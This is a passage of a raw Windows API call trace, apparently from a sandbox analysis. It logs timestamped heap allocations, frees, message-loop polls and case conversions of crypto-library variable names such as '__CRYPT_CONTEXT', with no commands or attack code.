wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0216.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0216.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0216.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0216.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0216.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0216.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0216.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0216.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0216.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0216.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0216.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0216.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0216.610] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0216.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0216.610] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0216.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0216.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0216.610] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0216.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0216.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0216.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0216.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0216.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0216.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0216.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0216.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0216.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0216.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0216.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0216.610] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0216.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0216.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0216.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0216.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0216.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0216.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0216.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0216.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0216.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0216.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0216.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0216.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0216.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0216.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0216.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0216.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0216.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0216.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0216.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0216.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0216.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0216.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0216.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0216.612] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0216.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0216.612] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0216.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0216.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0216.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0216.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0216.612] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0216.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0216.612] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0216.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0216.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0216.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0216.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0216.612] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0216.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0216.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0216.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0216.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0216.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0216.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0216.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0216.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0216.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0216.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0216.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0216.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0216.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0216.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0216.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0216.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0216.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0216.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0216.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0216.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0216.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0216.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0216.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0216.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0216.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0216.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0216.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0216.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0216.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0216.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0216.614] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0216.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0216.614] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0216.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0216.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0216.614] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0216.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0216.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0216.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0216.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0216.614] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0216.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0216.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0216.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0216.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0216.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0216.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0216.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0216.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0216.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0216.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0216.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0216.614] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0216.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0216.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0216.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0216.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0216.615] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0216.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0216.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0216.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0216.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0216.615] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0216.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0216.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0216.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0216.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0216.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0216.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0216.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0216.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0216.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0216.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0216.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0216.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0216.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0216.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0216.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0216.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0216.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0216.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0216.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0216.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0216.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0216.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0216.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0216.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0216.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0216.616] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0216.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0216.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0216.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0216.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0216.616] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0216.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0216.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0216.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0216.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0216.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0216.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0216.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0216.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0216.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0216.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0216.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0216.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0216.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0216.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0216.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0216.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0216.617] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0216.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0216.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0216.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0216.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0216.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0216.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0216.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0216.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0216.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0216.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0216.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0216.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0216.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0216.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0216.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0216.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0216.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0216.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0216.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0216.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0216.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0216.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0216.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0216.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0216.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 